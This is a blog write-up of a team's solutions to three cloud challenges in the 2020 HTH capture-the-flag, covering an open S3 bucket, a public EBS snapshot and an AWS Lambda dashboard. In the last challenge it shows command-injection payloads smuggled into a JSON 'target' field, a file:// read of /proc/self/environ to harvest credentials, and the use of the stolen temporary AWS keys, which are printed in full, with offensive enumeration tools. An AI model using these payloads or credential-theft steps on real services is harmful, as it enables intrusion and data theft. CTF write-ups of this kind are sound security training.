2020 HTH CTF - Cloud Challenges

Last weekend, @strupo_ joined team NiSec to participate in the HTH 2020 CTF and together they got on the podium in third place!

2020 HTH CTF - Final Scoreboard

The challenge categories included: 
  • Cloud
  • Crypto
  • Forensics
  • Kali 101 
  • Misc
  • Pwnables
  • Recon
  • Reverse Engineering
  • Steganography
  • Web
Recently, strupo_ was fortunate enough to remotely attend Breaching the Cloud Perimeter w/Beau Bullock. As cloud testing is still very new to him, and this blog tends to focus on introductory concepts and challenges, we thought it would be appropriate to try and tackle all of the cloud challenges in this post.

Okay, let's get into it.

The Cloud category had three challenges:

  • BucketList (100)
  • OhSnap! (150)
  • Serving Less (250)


Hey guys! I set up an AWS bucket for this year's hth that we can use to store our flags for the ctf. I think I made the bucket private but I'm not very good at this cloud stuff. Send me a message if I need to edit the permissions.
Hint: Let's keep a flag in hth2020-private where it should be safe!

The challenge implied that we needed to find an AWS bucket and the hint indicated that the flag would be in the a bucket called "hth2020-private." 

In the past, we've used Slurp to enumerate buckets, but recently we've switched over to cloud_enum.

Here is how to install cloud_enum:

git clone && cd cloud_enum
pip3 install -r ./requirements.txt

The command used to solve this challenge can be seen here: 

./cloud_enum.py -k hth2020-private --disable-azure --disable-gcp


Keywords: hth2020-private
Mutations: /home/kali/cloud_enum/enum_tools/fuzz.txt
Brute-list: /home/kali/cloud_enum/enum_tools/fuzz.txt
[+] Mutations list imported: 242 items
[+] Mutated results: 1453 items

amazon checks

[+] Checking for S3 buckets
OPEN S3 BUCKET: http://hth2020-private.s3.amazonaws.com/



We can see that cloud_enum found flag.txt in an open S3 bucket so it was simply a matter of reviewing the file: 

curl http://hth2020-private.s3.amazonaws.com/flag.txt
"I'm pretty sure I backed up the hth instance properly. Can you double check and see if the snapshots worked?"

Struggle Bus: early on we had some issues with this challenge due to Amazon blocking our source IP. The tool would run but no results were returned. Luckily, all we had to do was switch to a different VPN server until we saw results.


I'm pretty sure that I backed up our hth instance properly. Can you take a look at the AWS EBS snapshots and check?

hint: You will need an AWS account for this challenge. You can make one for free here: https://aws.amazon.com/resources/create-account/

For this one, we logged into our AWS account, and fumbled around the management console looking for public snapshots. One issue that we encountered was that we didn't think about which region we were connected to. Us-east-1 is in Virginia, and we found a snapshot where the time was in line with the last modified date that was gleaned from the the S3 bucket:

curl http://hth2020-private.s3.amazonaws.com/?versions

<?xml version="1.0" encoding="UTF-8"?>

<ListVersionsResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"><Name>hth2020-private</Name><Prefix></Prefix><KeyMarker></KeyMarker><VersionIdMarker></VersionIdMarker><MaxKeys>1000</MaxKeys><IsTruncated>false</IsTruncated><Version><Key>flag.txt</Key><VersionId>null</VersionId><IsLatest>true</IsLatest><LastModified>2020-10-30T03:15:56.000Z</LastModified><ETag>&quot;a3ebad67ece35f433c096e86651eba0b&quot;</ETag><Size>146</Size><StorageClass>STANDARD</StorageClass></Version></ListVersionsResult>

After restoring the snapshot and attempting to connect to it, we hit a wall. Taking a minute to think about it, HTHackers is a central Ohio event and so we switched to us-east-2 and searched the public snapshots for "hth" where we found the flag. 

Because the command line is preferable to a GUI, we then solved this challenge again using the AWS cli tool. Here's how to do it:

First, set up your AWS keys by using aws configure.

aws configure

AWS Access Key ID [****************FOO]: 
AWS Secret Access Key [****************BAR]: 
Default region name [us-east-1]: us-east-2
Default output format [None]:

Then, we ran the aws tool, setting the service to ec2 with the describe-snapshots command. We also used the --filters option to search descriptions for terms as seen below:

aws ec2 describe-snapshots --filters Name=description,Values=HTH*

    "Snapshots": [
            "Description": "HTH{allyoursnapshotarebelongtous}",                   "Encrypted": false,
            "OwnerId": "351074089145",
            "Progress": "100%",
            "SnapshotId": "snap-0a54e4713301df94b",                               "StartTime": "2020-10-30T01:55:03.049Z",
State": "completed",
            "VolumeId": "vol-0f8e9b600853f9f23",
            "VolumeSize": 1

Struggle bus: Copying that random public snapshot, starting it up, and attempting to connect to it incurred a charge of roughly $90 USD. Thankfully, we used a privacy card with a $1 limit to setup the account. We are currently working with Amazon to resolve this issue which apparently requires a fax!

Greetings from Amazon Web Services.

We are unable to validate important details about your Amazon Web Services (AWS) account. Your AWS account has been placed on hold pending additional verification. At this time, we need you to verify the details of your account.

Please fax us a copy of the documentation listed below:
-- Current bill showing your address (utility bill, phone bill, or similar)
-- Student ID card, if applicable

We request that you also provide us with the following information:
-- Business name
-- Business phone number
-- Billing telephone number on file with the bank
-- Bank phone number (found on the back of your card)

Serving Less (250)

Full disclosure: While we did have RCE on this system before the competition ended. We were ultimately unable to solve this challenge on our own. After the event ended - we asked for lots of help after the finding the first two flags. Special thanks to @atomnet, the only player to solve the challenge during the event, and @syn_ack_zack, who created the challenge and held our hand for the very last part of it.

A simple dashboard monitoring page built in the Cloud, what could go wrong?

hint: It looks like the dashboard contains output from different shell commands, I wonder if you can run your own commands?

This link presented the following web page. From the hint and the contents of the page itself we inferred that we would need to find some place to inject commands:

System Monitor

Initial fuzzing for parameters was quickly halted due to the target throttling requests. We knew this would have to be a manual process so the first place we looked was the HTML source where we observed the following comment:

var secured = new XMLHttpRequest();

secured.onreadystatechange = function() {
   if (this.readyState == 4 && this.status == 200) {
      document.getElementById("secured").innerHTML = this.responseText;

secured.open("POST", "https://qbf6sc8oa5.execute-api.us-east-1.amazonaws.com/controller", true);

From this, we inferred that we could send a POST request with the "target" parameter set to a url, we would have our injection point as it was the only parameter to be found on the target system.  

We tested this using curl:

curl -X POST -d '{"target":"https://controller-cache.s3.amazonaws.com/"}' https://qbf6sc8oa5.execute-api.us-east-1.amazonaws.com/controller
"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>24E9CE049D4A0A12</RequestId><HostId>/6iRi8Qs2hGZlqmHcDxojC5b2ICikOGQQf2JXGdQgaGtB4ZmyLDoyuwlnni+zop5fY/P3vlM7SA=</HostId></Error>

curl -X POST -d '{"target":"welcomethrill.house"}' https://qbf6sc8oa5.execute-api.us-east-1.amazonaws.com/controller
"<HTML><HEAD><meta http-equiv=\"content-type\" content=\"text/html;charset=utf-8\">\n<TITLE>301 Moved</TITLE></HEAD><BODY>\n<H1>301 Moved</H1>\nThe document has moved\n<A HREF=\"http://blog.welcomethrill.house/\">here</A>.\n</BODY>

curl -X POST -d '{"target":"welcomethrill.house &&id"}' https://qbf6sc8oa5.execute-api.us-east-1.amazonaws.com/controller
"<HTML><HEAD><meta http-equiv=\"content-type\" content=\"text/html;charset=utf-8\">\n<TITLE>301 Moved</TITLE></HEAD><BODY>\n<H1>301 Moved</H1>\nThe document has moved\n<A HREF=\"http://blog.welcomethrill.house/\">here</A>.\n</BODY></HTML>\nuid=994(sbx_user1051) gid=991 groups=991\n"


We then began initial reconnaissance by running commands such as pwd and ls. The output from ls showed that there was a file "lambda_function.py" present. We used cat to read the contents for anything of interest:

curl -X POST -d'{"target":"welcomethrill.house &&cat lambda_function.py"}' https://qbf6sc8oa5.execute-api.us-eastt-1.amazonaws.com/controller | sed 's/\\n/\n/g' &&echo
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 4881 100 4823 100 58 6597 79 --:--:-- --:--:-- --:--:-- 6668
"<HTML><HEAD><meta http-equiv=\"content-type\" content=\"text/html;charset=utf-8\">
<H1>301 Moved</H1>
The document has moved
<A HREF=\"http://blog.welcomethrill.house/\">here</A>.
import json
import requests
from subprocess import PIPE, run
import base64



The string under FRAGMENT - 01 looked like a hex string so we converted it to ASCII using xxd:

echo 4854487b6e300a0a | xxd -r -p

Next, we captured the second part of the flag by observing the output of the set command:

curl -X POST -d'{"target":"welcomethrill.house && set"}' https://qbf6sc8oa5.execute-api.us-east-1.amazonaws.com/controller | sed 's/\\n/\n/g'&&echo
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2877 100 2838 100 39 1558 21 0:00:01 0:00:01 --:--:-- 1579
"<HTML><HEAD><meta http-equiv=\"content-type\" content=\"text/html;charset=utf-8\">
<H1>301 Moved</H1>
The document has moved
<A HREF=\"http://blog.welcomethrill.house/\">here</A>.
BASH_EXECUTION_STRING='curl welcomethrill.house && set'
BASH_VERSINFO=([0]=\"4\" [1]=\"2\" [2]=\"46\" [3]=\"2\" [4]=\"release\" [5]=\"x86_64-redhat-linux-gnu\")
IFS=' \t
PS4='+ '

Here's the value converted:

echo 5f35655276330a0a | xxd -r -p

We also took note of the AWS keys that were defined. The AWS_ACCESS_KEY begins with ASIA, which means they are temporary credentials. This meant we'd have to check the key value about every 10 minutes so we always had valid credentials. If the ID began with AKIA, we would know that they are long-term credentials and we wouldn't have to worry so much about how long we were taking to perform the review. 

If you have made it this far and you would just like the solution, please skip to the end. The bulk of this write-up is meant not only to regale you all with our time on the struggle bus, but also to introduce you to a few AWS testing tools if you haven't heard of them already.  Namely, these:
  • Pacu
  • WeirdAAL
  • Enumerate-IAM
We started the review by using pacu.


What is pacu? Here's a snippet we stole from the readme:

Pacu is an open-source AWS exploitation framework, designed for offensive security testing against cloud environments. Created and maintained by Rhino Security Labs, Pacu allows penetration testers to exploit configuration flaws within an AWS account, using modules to easily expand its functionality. Current modules enable a range of attacks, including user privilege escalation, backdooring of IAM users, attacking vulnerable Lambda functions, and much more.

Installation and use was straight forward:

git clone https://github.com/RhinoSecurityLabs/pacu && cd pacu 
bash install.sh 
python3 pacu.py
        ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀  ⢀⡀                    

Found existing sessions:
  [0] New session
  [1] wtg

Choose an option: 0
What would you like to name this new session? hth
Pacu (hth:No Keys Set) > set_keys
Key alias [None]: hth
Access key ID [None]: ASIA5FQD66V2EJB2PXZO
Secret access key [None]: 9rBaTz2mJsoAfSEhxv3yShviQ4z6H5dbZ7caOT2P
Session token (Optional - for temp AWS keys only) [None]: IQoJb3JpZ2luX2VjEJT//////////wEaCXVuCtAXoAiB5<snip>rkLmWYx5a5/oaaQ==
Keys saved to database.
Pacu (hth:hth) > 

Unfortunately for us, Pacu was not the right tool for the job. In lieu of covering how we ran, literally, all of the modules and failed, here are some basic tips and tricks instead:

To list modules, type ls

To run a module, type: run <module__name>   # for example:  Pacu (hth:hth) > run ec2__enum

To verify what keys you are using, type: whoami

It also supports running aws cli commands at the pacu prompt.


Next, we used WeirdAAL to see if we missed any permissions. From the readme:

WeirdAAL has two goals:
  1. Answer what can I do with this AWS Keypair [blackbox]?
  2. Be a repository of useful functions (offensive & defensive) to interact with AWS services.
Installation and setup was very straight forward:

git clone https://github.com/carnal0wnage/weirdAAL.git 
cd weirdAAL 
sudo apt-get install python3-venv
python3 -m venv weirdAAL 
source weirdAAL/bin/activate 
pip3 install -r requirements.txt
python3 create_dbs.py

There were a few missing dependencies on our Kali 2020.2 image that we installed using pip, but nothing overwhelming.

We then edited the .env file and added our keys to the file. Remembering the keys are only valid for a short time, we checked that they were still valid when the tool finished running. Our .env file looked something like this:

cat .env
aws_access_key_id = ASIA5FQD66V2GBTFRPGO
aws_secret_access_key = iXh93G067aEoR7mqGSYLAkBb0hImSzIMXR9/IoyO
aws_session_token = IQoJb3JpZ2luX2VjELf//////////wEaC<snip>bBA==

Here was the command we used for the first run:

python3 ./weirdAAL.py -m recon_all -t hth2020


We parsed out the following permissions:

[+] elasticbeanstalk Actions allowed are [+]
['DescribeApplications', 'DescribeApplicationVersions', 'DescribeEnvironments', 'DescribeEvents']

[+] opsworks Actions allowed are [+]

[+] route53 Actions allowed are [+]

[+] sts Actions allowed are [+]

At this point, we pored over the aws cli documentation as it related to the identified services (sts, route53, opsworks, elasticbeanstalk) and basically investigated every command, query, and option that went along with them. 

We learned a lot, but obviously not enough, and as of this point we were still unable to solve the challenge.


Then, we tried a third tool called enumerate-iam per the recommendation of keramas to see if we could find anything else. 

Installation and usage:

git clone git@github.com:andresriancho/enumerate-iam.git 
cd enumerate-iam/ 
pip install -r requirements.txt
./enumerate-iam.py --access-key ASIA5FQD66V2LOPLOLYH --secret-key GNVI5HRw7bBx2/H9++TJOvrc6WnzRJi2vdKQ5shj --session-token IQoJb3JpZ2luX2VjEKv//////////wEaC<snip>xfg== --region us-east-1
2020-11-16 18:51:29,900 - 84840 - [INFO] Starting permission enumeration for access-key-id "ASIA5FQD66V2LOPLOLYH"
2020-11-16 18:51:30,502 - 84840 - [INFO] -- Account ARN : arn:aws:sts::905172678004:assumed-role/hth_2020_surfin-role-9mahzo9e/controller_logic
2020-11-16 18:51:30,502 - 84840 - [INFO] -- Account Id : 905172678004
2020-11-16 18:51:30,502 - 84840 - [INFO] -- Account Path: assumed-role/hth_2020_surfin-role-9mahzo9e/controller_logic
2020-11-16 18:51:31,318 - 84840 - [INFO] Attempting common-service describe / list brute force.
2020-11-16 18:51:33,532 - 84840 - [INFO] -- sts.get_caller_identity() worked!
2020-11-16 18:51:33,724 - 84840 - [INFO] -- dynamodb.describe_endpoints() worked!

Enumerate-iam found the describe-endpoints command for the dynamodb service but the tool hung up and manual verification with aws cli resulted in nothing but "AccessDeniedException" error messages or information that was uninteresting.

Finally, we were left with not much more than aws cli and our wits. 


We spent hours and hours reading documentation concerning this tool and trying commands, interacting with xray, the lambda runtime, using regex, and trying to describe or list out...something.  

What we encountered were a lot of error messages, like this one for example:

aws s3 ls s3://controller-cache.s3.us-east-1.amazonaws.com/
An error occurred (NoSuchBucket) when calling the ListObjectsV2 operation: The specified bucket does not exist

Before we get to the solution, we wanted to showcase a way to potentially expose sensitive information when you have SSRF or RCE in a target as described in this write-up on github by RhinoSecurityLabs.

We knew we could run additional commands by leveraging the && construct, but after reading the lambda_function.py script, we understood that it was taking the target parameter value and passing it to curl. So, we were able to recreate the attack exactly as described in the write-up by sending the following request:

curl -X POST -d'{"target":"http://localhost:9001/2018-06-01/runtime/invocation/next"}' https://qbf6sc8oa5.execute-api.us-east-1.amazonaws.com/controller
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1156 100 1087 100 69 2127 135 --:--:-- --:--:-- --:--:-- 2262
"{\"version\":\"2.0\",\"routeKey\":\"ANY /controller\",\"rawPath\":\"/controller\",\"rawQueryString\":\"\",\"headers\":{\"accept\":\"*/*\",\"content-length\":\"69\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"qbf6sc8oa5.execute-api.us-east-1.amazonaws.com\",\"user-agent\":\"curl/7.72.0\",\"x-amzn-trace-id\":\"Root=1-5fb5ff71-0b32fd6e66c2c9213ed75fae\",\"x-forwarded-for\":\"\",\"x-forwarded-port\":\"443\",\"x-forwarded-proto\":\"https\"},\"requestContext\":{\"accountId\":\"905172678004\",\"apiId\":\"qbf6sc8oa5\",\"domainName\":\"qbf6sc8oa5.execute-api.us-east-1.amazonaws.com\",\"domainPrefix\":\"qbf6sc8oa5\",\"http\":{\"method\":\"POST\",\"path\":\"/controller\",\"protocol\":\"HTTP/1.1\",\"sourceIp\":\"\",\"userAgent\":\"curl/7.72.0\"},\"requestId\":\"WPTZuj6NIAMEMBw=\",\"routeKey\":\"ANY /controller\",\"stage\":\"$default\",\"time\":\"19/Nov/2020:05:15:29 +0000\",\"timeEpoch\":1605762929331},\"body\":\"eyJ0YXJnZXQiOiJodHRwOi8vbG9jYWxob3N0OjkwMDEvMjAxOC0wNi0wMS9ydW50aW1lL2ludm9jYXRpb24vbmV4dCJ9\",\"isBase64Encoded\":true}"

Or, another way to grab the keys:

curl -X POST -d'{"target":"file:///proc/self/environ"}' https://qbf6sc8oa5.execute-api.us-east-1.amazonaws.com/controller
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2053 100 2015 100 38 4324 81 --:--:-- --:--:-- --:--:-- 4396

The Solution

We did notice the s3 bucket in the commented out portion of the script where we found the command injection vulnerability. We also tried multiple times to munge it and guess and "correct" the URL by adding things like regions to it. In the end we didn't understand where to go from here. 

Finally, we reached out to syn-ack-zack one last time, ready to throw in the towel when he explained we simply needed to remove the domain from the bucket. 

Sad Times.

We pulled a fresh set of keys and issued the following commands:

aws s3 ls s3://controller-cache
2020-10-17 20:42:28 79 secure.bin

aws s3 cp s3://controller-cache/secure.bin .
download: s3://controller-cache/secure.bin to ./secure.bin

cat ./secure.bin


cat ./secure.bin | grep 7 | xxd -r -p

Putting it all together and, finally, we see the Serving Less flag:



CTFs, in our opinion, are the best teachers for hackers. They motivate you to read technical documentation for hours on end, they encourage you to take chances, make mistakes, and to keep at it. In our experience, the knowledge and lessons learned during CTFs will stick with you the longest.  
We highly recommend choosing events and challenges focused on technology and concepts you know little or nothing about. It's both humbling and rewarding. 

Hackers Teaching Hackers put on a great CTF and we certainly learned a lot. Thanks to everyone at HTHackers and everyone on team NiSec! 
Thanks for reading!

Find us on twitter: @teamWTG

Popular posts from this blog

The Audacity of Some CTFs

Code Name: Treehouse of Horror CTF

DEF CON 26 - IoT Village - SOHOpelessly Broken CTF